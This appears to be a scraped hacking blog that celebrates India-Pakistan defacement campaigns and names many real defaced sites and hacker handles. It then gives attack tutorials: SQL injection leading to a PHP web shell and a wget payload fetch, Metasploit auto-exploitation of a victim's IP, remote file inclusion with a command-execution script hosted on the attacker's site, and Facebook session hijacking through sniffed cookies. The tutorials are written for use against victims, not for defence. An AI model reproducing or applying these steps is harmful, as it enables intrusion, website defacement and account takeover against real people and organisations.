The Secuirty Resercher From India Adesh Nandkishor Listed in Microsoft Top 100 Security Resercher at 70th Position

The Secuirty Resercher From India Adesh Nandkishor Listed in Microsoft Top 100 Security Resercher at 70th Position

36473125_2066326896918772_8244847129546194944_nDkGF_pHVAAA6zmX.jpg largeCapture

19 Years Old Indian young man Adesh Nandkishor Kolte was among the 100 most respected hackers in the world by Microsoft at the BlackHat conference in America, and Adesh ranked 70 on the list.
“It’s a good feeling to see my name on this list that was published by Microsoft today,” the young man wrote on Facebook. “Let’s make the Internet a safer world than reality.”

Here’s the complete menu link:

https://blogs.technet.microsoft.com/msrc/2018/08/08/microsofts-top-100-security-researchers-black-hat-2018-edition

Advertisements

Indian Hacking teams Celebrates India’s 70th independence day by hacking down more than 500 pakistani sites

 

13912608_1055899691131253_42221782145687735_n

phpThumb_generated_thumbnail

After maintaining a long gap of silence for over 1 year, indian hackers finally showed their true colours on the occasion of India’s 70th independence day by hacking down over 350 pakistani sites, a dozen of uk sites and a bunch full of other country sites. Both side indian and pakistani hackers were battling with each other since decades. Prior to pakistan’s independence day on 14th august, pakistani hackers had defaced over a dozen of Indian sites to celebrate the occasion of their independence. And within just a single day indian hackers reverted the entire game by hacking more than 500 pakistani sites as payback for destroying the indian sites. Even hackers from all over the world from distant countries like AFGHANISTAN and PHILIPPINES join the yesterdays attack just to celebrate india’s independence day.
Some days ago a pak hacker MIYAN ALIYAN who goes by the name MR. VIRUS hacked a couple of sites namely policekhulasa.com and policesarkar.com and had wiped out entire data from the site that made the developer of the site Vijay Jadav beg infront of miyan to get all his data back. The cowner of those 2 sites was asking for a full refund back from the developer which forced him to beg to miyan for getting back the data. But miyan made fun of him by posting about him in facebook. The full data of the website had been blatantly wiped out without making any backup.
This enraged many indian hackers for giving them payback, some had even posted about the misdoings of mian in their deface in various sites.

Some uk sites had also been defaced by indian hackers. They mentioned the cause behind it as enslaving india for over 200 years.

Below are the some of the eminent teams that participated in the full blown attack yesterday

#LULZSECINDIA
#GhostINDIA
#Afgan cyber army
#Hell shield hackers
#Indian cyber security force
#Kerala cyber warriors
#Team hind hackers
#Philippine cyber army
#Indiskullz
#Indian black hats

Some of the eminent hackers behind this attack was
Mr.Cyb3rwarrior_Ades
S3r!0us_B14cK
AN0N.PH03N1X
gab4r
Mr.t1w4r1
D4S H4XOR
Jr.NTR
The Saint
Cyberwalker
Xyber worm
Hexking
Po panda
Dhani
Cyberl337
Spider64
Pinku mishra

Heres the list of all pak sites defaced by them

http://hanamedinst.com
http://ramzangloves.com
http://www.mxm-sports.com/
http://www.kellinind.com
http://legalmatters.com.pk/
http://www.synergy.com.pk/
http://www.adspakistan.pk/
http://www.buyoffplan.net/
http://legalmatters.com.pk/
http://www.synergy.com.pk/
http://www.adspakistan.pk/
http://www.buyoffplan.net/
http://www.csd.gov.pk/aadu.html
http://hjp.hec.gov.pk/uploads/aadu.html
http://hjp.hec.gov.pk/
http://www.pakistan.gov.pk
http://fria.com.pk
http://www.ozonecc.com
http://www.onegroupgarments.com
http://hjp.hec.gov.pk/uploads/Sec.html
http://fria.com.pk
http://www.ozonecc.com
http://www.onegroupgarments.com
http://callistasurgical.com
http://fria.com.pk
http://www.ozonecc.com
http://www.onegroupgarments.com
http://hjp.hec.gov.pk/uploads/15aug.html
http://fria.com.pk/15%20August.html
http://clginstitute.org
http://accipiterintl.com.pk/admin/
http://hjp.hec.gov.pk/uploads/gab4r.html
http://owaiiui.org/
http://csd.gov.pk/gab4r.html
http://kpptchangu.gov.pk/independence.php
http://actmacollege.edu.pk/indipendence.php http://emerson.edu.pk/indipendence.php
http://gpighyd.edu.pk/indipendence.php
http://www.biseatd.edu.pk/independence.php
http://aps.edu.pk/indipendence.php
http://www.albaih.com.pk
http://www.kurram.pk
http://haswani.com.pk/independence.php
http://www.trackschool.pk/independence.php
http://web-development.pk/independence.php
http://software-development.pk/independence.php
http://attrayantdesigns.com/independence.php
http://gap.org.pk/independence.php
http://kakakhelmarketing.pk/indipendence.php
http://imexintl.com.pk/indipendence.php
http://nbea.org.pk/independence.php
http://www.lbspak.com/independence.php
http://warningnews.pk/independence.php
http://amenterprises.pk/indipendence.php
http://altawakkalenterprises.pk/indipendence.php
http://soch.net.pk/indipendence.php
http://investorsinn.pk/indipendence.php
http://www.alphonsocorp.com/
http://www.ariverrunsthruit.com/
http://alpineint.com/indipendence.php
http://dogwoodk.com/indipendence.html
http://hkestates.pk/indipendence.php
http://esouq.pk/independence.php
http://almadar.co/indipendence.php
http://5brothersoverseas.com/indipendence.php
http://unicon.com.pk/indipendence.php
http://calyx.com.pk/indipendence.php
http://www.capoeira.com.pk/indipendence.php
http://arent.com.pk/indipendence.php
http://www.architectureplus.com.pk/indipendence.php
http://beyondbattle.com.pk/indipendence.php
http://www.akme.com.pk/indipendence.php
http://halalshop.pk/indipendence.php
http://contractus.pk/indipendence.php
http://smartcore.com.pk/indipendence.php
http://octopusvpn.com/independence.php
http://fmzfiresafety.com/independence.php
http://wrongno.pk/indipendence.php
http://www.feasiblesolutionpk.com/independence.php
http://www.cookawesome.com/independence.php
http://nwtlimited.com/independence.php
http://webads.pk/independence.php
http://synchro.com.pk/independence.php
http://britgaspar.com/independence.php
http://sociology.usindh.edu.pk/ind.html
http://iad.usindh.edu.pk/ind.html
http://iarscs.usindh.edu.pk/ind.html
http://iba.usindh.edu.pk/ind.html
http://exam.usindh.edu.pk/ind.html
http://iict.usindh.edu.pk/ind.html
http://imcs.usindh.edu.pk/ind.html
http://usindh.edu.pk
http://mbbscd.usindh.edu.pk/ind.html
http://ncearc.usindh.edu.pk/ind.html
http://new_joom.usindh.edu.pk/ind.html
http://oric.usindh.edu.pk/ind.html
http://qec.usindh.edu.pk/ind.html
http://sas.usindh.edu.pk/ind.html
http://scholars.usindh.edu.pk/ind.html
http://scholars.usindh.edu.pk/ind.html
http://student.usindh.edu.pk/ind.html
http://sucm.usindh.edu.pk/ind.html
http://sujo.usindh.edu.pk/ind.html
http://cmsu.usindh.edu.pk/index.html
http://ayutthaya.labour.go.th/India/
http://beneficenciaayacucho.gob.pe/india/
http://osh12.labour.go.th/india/
http://aclassictouchpainting.net/india/
http://advocaredaytonabeach.com/india/
http://advocarefloridastore.com/india/
http://advocarediscounts.com/india/
http://advocareonsale.com/india/
http://advocarespecials.com/india/
http://affordablebeachwedding.com/india/
http://assistedlivingdaytona.com/india/
http://assistedlivingportorange.com/india/
http://atlanticaesthetics.com/india/
http://atlanticeyecenter.com/india/
http://autoconsolecoversplus.com/india/
http://thebabyshoppeonline.com/india/
http://beachsidemedical.com/india/
http://beauidealplus.com/india/
http://edgewaterbizhub.com/india/
http://bucksgunrack.com/india/
https://pohlcnc.com/india/
http://cocosdoggydaycare.com/india/
http://cwrightlandscaping.com/india/
http://www.24daychallengeinfo.com/india/
http://daytonabeachwedding.net/india/
http://daytonaisgood.com/india/
http://daytonabeachphotographer.com/india/
http://daytonabeachweddingplanner.net/india/
http://dentistportorangefl.com/india/
http://diysecuritysystemsdaytonabeach.com/india/
http://3dmobilescan.com/india/
http://carlbennettchiropractic.com/india/
http://edgewaterlanding.com/india/
http://emcdivers.com/india/
http://epoxydaytona.com/india/
http://erosioncontrolfl.com/india/
http://drmache.com/india/
http://flarefittings.net/india/
http://frankreubeldesigns.com/india/
http://girlcamocosmetics.com/india/
http://hattygroup.com/india/
http://dosscapsdev.com/india.php
http://hillsfence.com/india/
http://hosthoteladvertising.com/india/
http://jasonscorner.com/india/
http://landscapingpalmcoastfl.com/india/
http://legacylaw313.com/india/
http://lewisheasterproperties.com/india/
http://www.lfwm.org/india/
http://livavedafl.com/india/
http://newsmyrnabeachlandscaping.com/india/
http://oakhillcommunitytrust.com/india/
http://ormondbeachweddings.com/india/
http://outlawschapel.com/india/
http://patientadvocatesflorida.com/india/
http://ponceinletwedding.com/india/
http://www.portorangeweddings.net/india/
http://printingdaytonabeach.com/india/
http://reliableautorepairservice.com/india/
http://reservestudypartners.com/india/
http://demands.pk/
https://www.talissadecor.com/india.php
http://jlseguridad.com/india.php
http://jjsur.com/india.php
http://loyolaayacucho.org.pe/india.php
http://anfasep.org.pe/india.php
http://ldfa.pe/india.php
http://beneficenciaayacucho.gob.pe/india.php
http://hiluxtrinidad.com/india.php
http://faharihilux.com/india.php
http://used-toyota-hilux.com/india.php
http://toyota-zambia.com/india.php
http://toyota-exporter.com/india.php
http://toyota-used-car.com/india.php
http://planethilux.com/india.php
http://hilux-kenya.com/india.php
http://dailytechdoze.com/india.php
http://singularsolution.net/india.php
http://www.montessoriacademyandcollege.co.za/india.php
http://hotelmathuranashik.com/india.php
http://perfectstyle.msk.ru/india.php
http://line-perfection.ru/india.php
http://conceptfashion.com/india.php
http://www.roznickaart.pl/india.php
http://tultpp.ru/india.php
http://k.ngskazka.ru/india.php
http://ngskazka.ru/india.php
http://v3.ngskazka.ru//india.php
http://vir.ngskazka.ru/india.php
http://shop.tristramboats.com/India/
http://taxi-odintsovo.ru/India/
http://xboxgaming.ir/india/
http://mijngestotter.nl/
http://inpt.tn/india/
http://airstill.com/India/
http://moninsyrup.com.au/India/
http://www.sherrybeer.com/India/
http://www.lav.com.ec/India/
http://tultpp.ru/india.php
http://www.entremusicos.cl/India/
http://7th-mc.com/india.html
http://sklepjubilerskidiament.pl/india.html
http://expaumi.org/wp/india.html
http://corporategiftsbangalore.com/india.html
http://clinicadentalreguera.com/mad.html
http://silvertreegroup.co.uk/india.php
http://hiluxtrinidad.com/india.php
http://sswebtesting.com/india.php
http://expaumi.org/wp/mad.html
http://hiluxtrinidad.com/india.php
http://www.thespringsrestaurant.com/india.php
http://rvaghasiaproperties.com/india.php
http://ugasaledd.com/india.php
http://allisonriggle.com/india.php
http://ayutthaya.labour.go.th/India/
http://shop.tristramboats.com/India/
http://taxi-odintsovo.ru/India/
http://xboxgaming.ir/india/
http://mijngestotter.nl/
http://inpt.tn/india/
http://airstill.com/India/
http://moninsyrup.com.au/India/
http://www.sherrybeer.com/India/
http://www.lav.com.ec/India/
http://tultpp.ru/india.php
http://www.entremusicos.cl/India/
http://www.rataj-spk.cz/India/
http://www.gorrotxategi.uk/India/
http://extra.delplast.fr/India/
http://www.vipcarstyleclub.com/India/
http://animeshop.si/India/
http://lafumashop.pl/modules/India/
http://www.elgallocojo.com/India/
http://brandonriggle.com/india.php
http://catherineriggle.com/india.php
http://clownbarf.com/india.php
http://eyemazingimages.com/india.php
http://leisurefoto.com/india.php
http://rigglerecipes.com/india.php
http://tarynonthenews.com/india.php
http://inhurd.unaab.edu.ng/india.php
http://beware-streetwear.com/india.php
http://marbleandtilecloseouts.com/india.php
https://www.steinhartwatches.de/india.php
http://wycart.com/india.php#
http://www.football-edge.com/india.php

The hacked uk sites are:

http://flyturkishairways.co.uk/
http://egyptairflights.co.uk/
http://www.flyqatarair.co.uk/
http://www.verda.ga/
http://flyethiopianflight.co.uk/
http://flyturkishairway.co.uk/
http://www.travelwideflights.co.uk/

Exclusive- भारतीय हैकरों का पाक को करारा जवाब, पाक सरकार की साइट हैक की

Exclusive- भारतीय हैकरों का पाक को करारा जवाब, पाक सरकार की साइट हैक की   War-Started

News Written BY Adesh kolte (blogger,hacker,Student)

 

phpThumb_generated_thumbnail15

अगस्त से पहले भारत-पाक में साइबर वाॅर शुरू, इंडिया के साइबर हैकर ग्रुप LulzSec ने हैक की साइट

pakistan.gov.pk Hacked By Lulzsec

पाकिस्तान  ने  गवर्मेंट इंजीनियरिंग जलगाँव  और ऐसे  कही Websites को हैक  किया

kashmiri cheetah  नामक  हैकर ने ये काम किया   और कही स्कूल  और इंडियन गवर्मेंट साईट पाक ने हैक कियी

इस्सी कारन इंडियन हच्केर्स ग्रुप  ने पाक की गवर्मेंट साइट्स को हैक करना स्टार्ट कर दिया

इंडियन हच्केर्स ग्रुप्स  के नाम सामने आये

#‎Indian_Cyber_Security_Force‬

#‎Indizkulzz‬

‪#‎ICG‬ ‪#‎

The_Mallu_Cyber_Solider‬ ‪#‎Hell_Shield_Hackers‬‪#‎

Indian_Black_Hats‬.

#‎Kerala_Cyber_Warriors‬ ‪#‎

Assam_Cyber_Warrior‬ &

‪#‎All_Indian_Hackers‬

pak Websites pwned by This TEam With The members leetname leaked

Mr.Cyb3rwarrior_Ades
S3r!0us_B14cK
AN0N.PH03N1X
gab4r
Baba420
MR.BLACK_H3X
Mr.t1w4r1
D4S H4XOR
Jr.NTR
Xyber worm
List of sites PAWNED TODAY by UNITED INDIAN HACKERS
http://hanamedinst.com
http://ramzangloves.com
http://www.mxm-sports.com/
http://www.kellinind.com
http://legalmatters.com.pk/
http://www.synergy.com.pk/
http://www.adspakistan.pk/
http://www.buyoffplan.net/
http://legalmatters.com.pk/
http://www.synergy.com.pk/
http://www.adspakistan.pk/
http://www.buyoffplan.net/
http://www.csd.gov.pk/aadu.html
http://hjp.hec.gov.pk/uploads/aadu.html
http://hjp.hec.gov.pk/
http://www.pakistan.gov.pk
http://fria.com.pk
http://www.ozonecc.com
http://www.onegroupgarments.com
http://hjp.hec.gov.pk/uploads/Sec.html
http://fria.com.pk
http://www.ozonecc.com
http://www.onegroupgarments.com
http://callistasurgical.com
http://fria.com.pk
http://www.ozonecc.com
http://www.onegroupgarments.com
http://hjp.hec.gov.pk/uploads/15aug.html
http://fria.com.pk/15%20August.html
http://clginstitute.org
http://accipiterintl.com.pk/admin/
http://hjp.hec.gov.pk/uploads/gab4r.html
http://owaiiui.org/
http://csd.gov.pk/gab4r.html
Team –
‪#‎Indian_Cyber_Army‬ | ‪#‎LulzSec_India‬ | ‪#‎Afghan_Cyber_Army‬ | ‪#‎Hell_Shield_Hackers‬ | ‪#‎Assam_Cyber_Warriors‬ | ‪#‎GhostINDIA‬ | ‪#‎IndiSkullz‬ | ‪#‎Kerala_Cyber_Warriors‬ | ‪#‎Philippine_Cyber_Army‬ | ‪#‎Indian_Cyber_Security_Force‬
‪#‎KeralaCyberWarriors‬
1) http://kpptchangu.gov.pk/independence.php
2) http://actmacollege.edu.pk/indipendence.php
3) http://emerson.edu.pk/indipendence.php
4) http://gpighyd.edu.pk/indipendence.php
5) http://www.biseatd.edu.pk/independence.php
6) http://aps.edu.pk/indipendence.php
7) http://www.albaih.com.pk
8) http://www.kurram.pk
9) http://haswani.com.pk/independence.php
10) http://www.trackschool.pk/independence.php
11) http://web-development.pk/independence.php
12) http://software-development.pk/independence.php
13) http://attrayantdesigns.com/independence.php
14) http://gap.org.pk/independence.php
15) http://kakakhelmarketing.pk/indipendence.php
16) http://imexintl.com.pk/indipendence.php
17) http://nbea.org.pk/independence.php
18) http://www.lbspak.com/independence.php
19) http://warningnews.pk/independence.php
20) http://amenterprises.pk/indipendence.php
21) http://altawakkalenterprises.pk/indipendence.php
22) http://soch.net.pk/indipendence.php
23) http://investorsinn.pk/indipendence.php
24) http://www.alphonsocorp.com/
25) http://www.ariverrunsthruit.com/
26) http://alpineint.com/indipendence.php
27) http://dogwoodk.com/indipendence.html
28) http://hkestates.pk/indipendence.php
29) http://esouq.pk/independence.php
30) http://almadar.co/indipendence.php
31) http://5brothersoverseas.com/indipendence.php
32) http://unicon.com.pk/indipendence.php
33) http://calyx.com.pk/indipendence.php
34) http://www.capoeira.com.pk/indipendence.php
35) http://arent.com.pk/indipendence.php
36) http://www.architectureplus.com.pk/indipendence.php
37) http://beyondbattle.com.pk/indipendence.php
38) http://www.akme.com.pk/indipendence.php
39) http://halalshop.pk/indipendence.php
40) http://contractus.pk/indipendence.php
41) http://smartcore.com.pk/indipendence.php
42) http://octopusvpn.com/independence.php
43) http://fmzfiresafety.com/independence.php
44) http://wrongno.pk/indipendence.php
45) http://www.feasiblesolutionpk.com/independence.php
46) http://www.cookawesome.com/independence.php
47) http://nwtlimited.com/independence.php
48) http://webads.pk/independence.php
49) http://synchro.com.pk/independence.php
50) http://britgaspar.com/independence.php
1: http://sociology.usindh.edu.pk/ind.html
2 http://iad.usindh.edu.pk/ind.html
3 http://iarscs.usindh.edu.pk/ind.html
4 http://iba.usindh.edu.pk/ind.html
5 http://exam.usindh.edu.pk/ind.html
6 http://iict.usindh.edu.pk/ind.html
7 http://imcs.usindh.edu.pk/ind.html
8 http://usindh.edu.pk
9 http://mbbscd.usindh.edu.pk/ind.html
10 http://ncearc.usindh.edu.pk/ind.html
11 http://new_joom.usindh.edu.pk/ind.html
12 http://oric.usindh.edu.pk/ind.html
13 http://qec.usindh.edu.pk/ind.html
14 http://sas.usindh.edu.pk/ind.html
15 http://scholars.usindh.edu.pk/ind.html
16 http://scholars.usindh.edu.pk/ind.html
17 http://student.usindh.edu.pk/ind.html
18 http://sucm.usindh.edu.pk/ind.html
19 http://sujo.usindh.edu.pk/ind.html
20 http://cmsu.usindh.edu.pk/index.html
Mirror Done : http://zone-h.org/mirror/id/26674396
http://zone-h.org/mirror/id/26674430
http://zone-h.org/mirror/id/26674430
http://zone-h.org/mirror/id/26674396
http://zone-h.org/mirror/id/26674433
http://zone-h.org/mirror/id/26674464
http://zone-h.org/mirror/id/26674474
http://zone-h.org/mirror/id/26674479
http://zone-h.org/mirror/id/26674480
http://zone-h.org/mirror/id/26674464
http://zone-h.org/mirror/id/26674484
http://zone-h.org/mirror/id/26674485
http://zone-h.org/mirror/id/26674485
http://zone-h.org/mirror/id/26674512

 

 

How to Upload Shell From SQL injection !Hruday Charan

 

 first of all find a website which is vulnerable to sql injection. You can find websites by dorks or manually Depends On your Capability !

But You need 2 main things Here:

  1. Root Path of the website 
  2. A Writable Directory 
Most of the time, you will see root path in SQL error of that site.Like the following one : Example

” Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in/home/hruday/public_html/functions.php on the line 1327 

But , If the vulnerable website doesn’t show the root path then don’t worry i will show you how to know the root path. And Also Writable Directory. :

http://www.site.com/index.php?id=10′

I am not starting with abc of SQLI I hope u know the basics 😀 ,
Now we have to found columns of the website then vulnerable columns like my site have 5 columns And 3 is the vulnerable column ,

http://www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,4,5–
http://www.site.com/index.php?id=-10 UniOn SeleCt 1,2,version(),4,5–

Let’s Try To Load Files Of The Website : 

We Won’t Need To Read Any Files Mentioned above just to increase your knowledge. Now we have to check the file privileges for the current user for this first you have to find current username.
Like This :

http://www.site.com/index.php?id=-10 UniOn SeleCt 1,2,current_user,4,5–

Our Current Username is etc mine is HrudayCharan ;
Now Check File Privilages for User HrudayCharan ;

http://www.site.com/index.php?id=-10 UniOn SeleCt 1,2,file_priv,4,5 FROM mysql.user WHERE user=’HrudayCharan’–

If it shows Y (yes) on the vulnerable column of the website , that means we have the file privileges for the current user HrudayCharan
And if it doesn’t show Y then Don’t waste your time there 😀
Ok Now we need to know the root path for this webserver. So, for this information we need to know the webserver type.For this you can use firefox adon server spy.

” Server Spy Adon: https://addons.mozilla.org/en-us/firefox/addon/server-spy/

You can use havij and some other tool too to detect webserver type.
To know the webserver by file /etc/passwd use this query

http://www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,load_file(‘/etc/passwd’),5–

now we have our webserver etc (/home/Hruday) :
now read one more file.

http://www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file(‘etc/HrudayCharan.conf’)4,5–

Where HrudayCharan is your webserver soft name like server name.conf .
now we have Obtained the root path

/home/site.com/public_html etc.

Now we have to find a writeable directory for this you can use google dorks as well and your knowledge too 😀

site http://www.site.com/dir/*/*/*/*/

so its site.com/Hruday is writeable
now we will upload our evil code

 ” http://www.site.com/index.php?id=10 UniOn SeleCt 1,2,”<?system($_REQUEST[‘cmd’]);?>”,4,5 into outfile ‘/home/site/public_html/Hruday/’WRITABLE_DIRECTORY’/hny.php’–+ “

ok now we have to execute our commands :

http://www.site.com/writeable_directory/hny.php?cmd=pwd ” OR
” COMMANDS YOU BASICALLY USE IN LINUX 😀 “

Now we will use wget command to upload our evil script : 3:) The Evil Attempt 😀

http://www.site.com/writeable_directory/hny.php?cmd=wget http://site.com/honey.txt -O honey.php” 

Now Open it . You Got Ready ! GoHere : http://www.site.com/WRITABLE_directory/honey.php And eNjoy The Shell 😀
Enjoy Hacking by Adesh kolte

How To Hack A Remote Computer Using IP Address( Addi haxor)

How To Hack A Remote Computer Using IP Address

Hacking a remote computer is always a hot topic among hackers and crackers, a newbie hacker or someone who wants to learn hacking always ask these questions that how to hack into a computer by just knowing the IP address of victim computer.

Today in this article I am going to explain step by step procedure to hack computer using IP address. But this tutorial is possible only when your friend’s / victim computer is online. If it is off or not connected to internet then remote IP hacking is totally impossible.

How To Hack A Remote Computer Using IP Address

Step 1: First you need to download Metasploit. The most up-to-date version is FREE at http://metasploit.com/

Step 2: You need PostgrSQL for your database. Download here: http://www.postgresql.org/.
Make sure you use all the defaults or Metasploit woun’t work!

Step 3: Now lets get down to buisness… After installing both tools, open up the PostgrSQL admin gui (start -> all programs -> PostgreSQL 9.0 -> pgAdmin III). Then right-click on your server (in the left hand box) and click connect. Remember to keep this window open the whole time. You will also need the pass you chose to use in step 5…

Pic : http://bit.ly/14rL5Ro

Step 4: Time for some hacking! Go to start -> all programs -> Metasploit Framework, and then open the Metasploit gui. Let it load untill it look like this : http://bit.ly/T5fjWT

Step 5: Now, in the window type:
db_connect postgres:ThePassYouChose@localhost:5432
The first time you do this you will see lots of text flash buy. Don’t wory, this is normal.

Step 6: Type db_host to make sure you are connected correctally.

Step 7: Now type this:

db_nmap 000.000.000.000
Make sure you put the ip of the computer you are trying to hack in the place of 000.000.000.000…

Step 8: Now we get to the fun part; the automatic exploitation.
Just type

db_autopwn -t -p -e -s -b ,

watch the auto-exploitation start, go play Halo for a while, and then come back…

Step 9: After the exploitation is done, type sessions -l to see what the scanner found. If all went well, you should see a list of exploits.

Step 10: Now we get to use the exploits to hack the computer! If you will notice, all of the exploits are numbered, and they all have obvious names (i. e., reverseScreen_tcp). In order to use an exploit, type this:

sessions -i ExploitNumber
The features of Metasploit are mutch like a rat. Once you get into someone’s computer, you can see their screen, controll their mouse, see what they type, see them, etc.

So friends, I hope this How To Hack A Remote Computer Using IP Address tutorial will be useful for you. If you have any problem in this How To Hack A Remote Computer Using IP Address tutorial,

RFI Remote file inclusion by Addi_haxor

RFI stands for Remote File Inclusion that allows the attacker to upload a custom coded/malicious file on a website or server using a script. The vulnerability exploit the poor validation checks in websites and can eventually lead to code execution on server or code execution on website (XSS attack using javascript). This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of tutorial, I suppose you will know what it is all about and may be able to deploy an attack or two.

RFI is a common vulnerability and trust me all website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and do almost anything. What makes it more dangerous is that you only need to have your common sense and basic knowledge of PHP to execute this one, some BASH might come handy as most of servers today are hosted on Linux

Starting with RFI

Lets get it started. The first step is to find vulnerable site, you can easily find them using Google dorks.If you don’t have any idea, you might want to read about advanced password hacking using Google dorks or to use automated tool to apply Google dorks using Google. Now lets assume we have found a vulnerable website

http://victimsite.com/index.php?page=home

As you can see, this website pulls documents stored in text format from server and renders them as web pages. We can find ways around it as it uses PHP include function to pull them out. Lets check it out.

http://victimsite.com/index.php?page=http://adeshsite.com/evilscript.txt

I have included a custom script “evilscript” in text format from my website, which contains some code.Now, if its a vulnerable website, then any of these 3 things can happen

  • Case 1 – You might have noticed that the url consisted of “page=home” had no extension, but I have included an extension in my url,hence the site may give an error like ‘failure to include evilscript.txt.txt’, this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
  • Case 2 – In case, it automatically appends something in the lines of .php then we have to use a null byte ‘%00’ in order to avoid error.
  • Case 3 – successfull execution 🙂

Now once you have battled around this one, you might want to learn what to code inside the script. You may get a custom coded infamous C99 script (too bloaty but highly effective once deployed) or you might code yourself a new one. For this knowledge of PHP might come in handy. Here we  go

<?php
echo “alert(U 4r3 0wn3d !!);”;
echo “Run command: “.htmlspecialchars($_GET[‘cmd’]);

system($_GET[‘cmd’]);
?>

The above code allows you to exploit include function and tests if the site if RFI (XSS) vulnerable by running the alert box code and if successful, you can send custom commands to the linux server in bash. So, if you are in luck and if it worked, lets try our hands on some Linux commands. For example to find the current working directory of server and then to list files, we will be using ‘pwd’ and ‘ls’ command

http//victimsite.com/index.php?cmd=pwd&page=http://adeshsite.com/ourscript

http//victimsite.com/index.php?cmd=ls&page=http://adeshsite.com/ourscript

What it does is that it sends the command as cmd we put in our script and begins print the working directory and list the documents.Even better you can almost make the page proclaim that you hacked it by using the ‘echo’ command.

cmd=echo U r pwn3d by xero> index.php

It will then re-write the index.php and render it.In case, its a primitive website which stores pages with .txt extension, you might want to put it with along the .txt files. Now as expected, we are now the alpha and the omega of the website 🙂 we can download, remove, rename, anything! Want to download stuff ? try the ‘wget’ function…

I leave the rest to your creativity !

have any Que call me frndzzz

:Adesh kolte

How to Hack Facebook Account Using Wireshark

Overview :-
                           Today we will be discussing about how to hack a facebook account using facebook chat.This can be done using a network analyser tool e.g Wiresh ark .You can also use backtrack and run wireshark in it .Now you have to chat with the victim fastly so that the data sent to you and from your victim to you can reach into wireshark and the wireshark would be enable to retrieve cookies from the data packets.
So basically you will be directly logged into victims account rather knowing his/her password.But thats enough for us 😉

Procedure :- 

STEP # 1 :- Download n install Wireshark . Download from Here

STEP # 2 :- Now Click on Caputre button and Start sniffing packets Note that you should also chat with your victim fastly so that more and more packets could reach us.


Above are our captured packets and below is the details of them.

STEP # 3 :- Now Ping http://facebook.com and search its IP-Address from below Captured packets and search for HTTP protocol through GET/home.php . If you can’t find one search forHTTP GET for Cookies.



STEP # 4 :- Now Right click on it and see its detailed there will be 9-10 cookies information that are 
stored by Facebook.com into Victims PC.Copy All to Note Pad. 


STEP # 5 :- Now Facebook Cookie format is “Datr” . Copy all these cookie information and openmozilla firefox and Add each cookie using cookie editor.Adds on For Mozilla


STEP # 6 :- After adding each cookie this should be like this.


STEP # 7 :- Now Open Facebook Home Page and you will find yourself logged into Victims PC.
Enjoy but this was for Educational and Informational Purpose only. This should work in Lan with Hub only.